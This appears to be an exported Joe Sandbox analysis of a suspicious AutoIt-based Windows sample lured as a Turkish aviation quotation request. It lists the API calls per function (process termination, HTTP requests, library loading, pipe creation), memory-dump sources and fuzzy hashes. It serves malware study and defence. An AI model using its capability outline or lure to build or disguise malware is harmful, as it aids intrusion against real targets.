                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FFB7CD
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FFB7D5
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FFB7EC
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00FFB7FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                                                                                    • Instruction ID: e228ca047a89fa307a799a8bddaa7445c89593c26b1f5f493b2cae0d9e27ca00
                                                                                                                                    • Opcode Fuzzy Hash: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                                                                                    • Instruction Fuzzy Hash: B2017175E00209BBEB20AFB69D49A5ABFB8EF48361F104065FA04A7291D6359C00CF90
                                                                                                                                    APIs
                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                    • Opcode ID: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                                                                                    • Instruction ID: 57e22c956061d07f80c418e64a8e773f935cfcc353254db86e6c6b6c55b79677
                                                                                                                                    • Opcode Fuzzy Hash: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                                                                                    • Instruction Fuzzy Hash: E90148B090275A7DE3108F6A8C85A52FEA8FF19394F00411BA15847941C7B5A868CBE5
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010053F9
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0100540F
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0100541E
                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100542D
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01005437
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100543E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                    • Opcode ID: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                                                                                    • Instruction ID: 292ed7cb422bd956d4e581eae71df40da1f8486edaa14c60ded6d4c1977e6565
                                                                                                                                    • Opcode Fuzzy Hash: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                                                                                    • Instruction Fuzzy Hash: B9F06D32240159BBE7315EA29C0EEEB7A7CEBCAB51F100159FA44D1081DAAA1A0187B5
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 01007243
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007254
                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00FB0EE4,?,?), ref: 01007261
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FB0EE4,?,?), ref: 0100726E
                                                                                                                                      • Part of subcall function 01006C35: CloseHandle.KERNEL32(00000000,?,0100727B,?,00FB0EE4,?,?), ref: 01006C3F
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01007281
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007288
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                    • Opcode ID: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                                                                                    • Instruction ID: 2f01443e139eb11c335f00e6fcd91c2b07385498c8101699587fe8e1ee24ce96
                                                                                                                                    • Opcode Fuzzy Hash: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                                                                                    • Instruction Fuzzy Hash: 9AF09A36441213ABE7722F24EE4C9EA7B3AEF07342F200121F28290098CB7B1404CB50
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FF899D
                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00FF89A9
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FF89B2
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FF89BA
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF89C3
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FF89CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
• Instruction ID: 2e6ba555572b31135730851b36a46976c0084085315d072ab6684b7c2a9985a1
• Opcode Fuzzy Hash: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
• Instruction Fuzzy Hash: 6CE0C936004002BBD6212FE1ED0C915BB79FB893A27B08220F255C1068CB375420DB50
APIs
• VariantInit.OLEAUT32(?), ref: 01018613
• CharUpperBuffW.USER32(?,?), ref: 01018722
• VariantClear.OLEAUT32(?), ref: 0101889A
  • Part of subcall function 01007562: VariantInit.OLEAUT32(00000000), ref: 010075A2
  • Part of subcall function 01007562: VariantCopy.OLEAUT32(00000000,?), ref: 010075AB
  • Part of subcall function 01007562: VariantClear.OLEAUT32(00000000), ref: 010075B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
• Instruction ID: 24d72ea266a33fca6477071b0c6e46e5bab84c2869f27ccec5b478ee3abd7f84
• Opcode Fuzzy Hash: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
• Instruction Fuzzy Hash: 59916D716083019FC710DF24C88495BBBF4EF89754F04896EF99A8B365DB39EA05CB92
APIs
  • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
• _memset.LIBCMT ref: 01002B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01002C97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: 23192a4efae3f1525debd141c9c4d8f80ea8a1e593e707ae0e27def02c18cdd5
• Instruction ID: 72f41bb81f7ac7fe784808763486699913188921cec4575ed96af97a786c4fef
• Opcode Fuzzy Hash: 23192a4efae3f1525debd141c9c4d8f80ea8a1e593e707ae0e27def02c18cdd5
• Instruction Fuzzy Hash: B851DC712083059EF7A6DEA8C849A6BBBE8EF89350F040A6DF9C5D21D1DB74C9448B52
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FFD60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FFD61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FFD69D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
• Instruction ID: f80ea59fa7337ee73b5e1b127919b757058d0cb2df356e0ac48e131490d56142
• Opcode Fuzzy Hash: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
• Instruction Fuzzy Hash: 6041AFB2600208EFDB15DF54C884AAA7BBAEF44314F1581A9EE09DF215D7B5DD40EBA0
APIs
• _memset.LIBCMT ref: 010027C0
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010027DC
• DeleteMenu.USER32(?,00000007,00000000), ref: 01002822
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01065890,00000000), ref: 0100286B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
• Instruction ID: b3c4892e15a426062dd68bf85ceaf1da34a80186edc88f3cb744dc4126d3a9c9
• Opcode Fuzzy Hash: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
• Instruction Fuzzy Hash: D341A0752053029FE722DF28C848F6ABBE8EF85314F14496DFAA5972D1D730A605CB52
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
  • Part of subcall function 00FA784B: _memmove.LIBCMT ref: 00FA7899
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: BuffCharLower_memmove
• String ID: cdecl$none$stdcall$winapi
• API String ID: 3425801089-567219261
• Opcode ID: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
• Instruction ID: b74dec7a65c5d567807b07eb9b7f6a17c4723a6735c71ca2feeeb132c801e533
• Opcode Fuzzy Hash: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
• Instruction Fuzzy Hash: 0B31B07190420AEBCF00EF98CC559EEB3B5FF05320B008659E8A9976D5DB39E905CB80
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FF8F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FF8F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00FF8F57
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
• Opcode ID: 1554797bfbb496d49efb03944215f9126ef83c4aa8ff0d3ed6c89d0172a18787
• Instruction ID: b12030a2be556af866a6cb4769bc0980607e7fa6d26bbbfcbf0d1c1c6a30a9f9
• Opcode Fuzzy Hash: 1554797bfbb496d49efb03944215f9126ef83c4aa8ff0d3ed6c89d0172a18787
• Instruction Fuzzy Hash: 7721D5B5A00109BEDB24ABB08C45DFFB779DF493A0F144519F955971E1DF3D480AB610
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010118A2
• InternetCloseHandle.WININET(00000000), ref: 010118E9
  • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
  • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
• Instruction ID: 828475eee851a34522e4e312a9770c3acfd0db540bd5549d3c312ef83794d03b
• Opcode Fuzzy Hash: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
• Instruction Fuzzy Hash: 5E21B0B1500309BFEB259FA4DC84EBF77FDEB48684F10812AFA85D2144DB798D0597A1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                                                                                      • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                                                                                      • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01026461
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 01026468
                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0102647D
                                                                                                                                    • DestroyWindow.USER32(?), ref: 01026485
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                    • Opcode ID: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                                                                                    • Instruction ID: 448664710f8c720a092376b449f01b557a167af4c66bb2ece7c7b7eb2df7a8c4
                                                                                                                                    • Opcode Fuzzy Hash: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                                                                                    • Instruction Fuzzy Hash: 8A218E71100226ABEF214E68DC54EBB77EEEB49364F108669FED093091DB369C419760
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01006DBC
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006DEF
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01006E01
                                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01006E3B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                    • Opcode ID: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                                                                                    • Instruction ID: 5c92dff753687d1a1634bf86fbfe8eb982f0bb1ac907fdcd0f3305ac17fc8daa
                                                                                                                                    • Opcode Fuzzy Hash: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                                                                                    • Instruction Fuzzy Hash: 2E21657190030AABEB31AF29D804A9A7BF9EF45720F20465AFDE1D72D0D7729964CB50
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01006E89
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006EBB
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01006ECC
                                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01006F06
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                    • Opcode ID: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
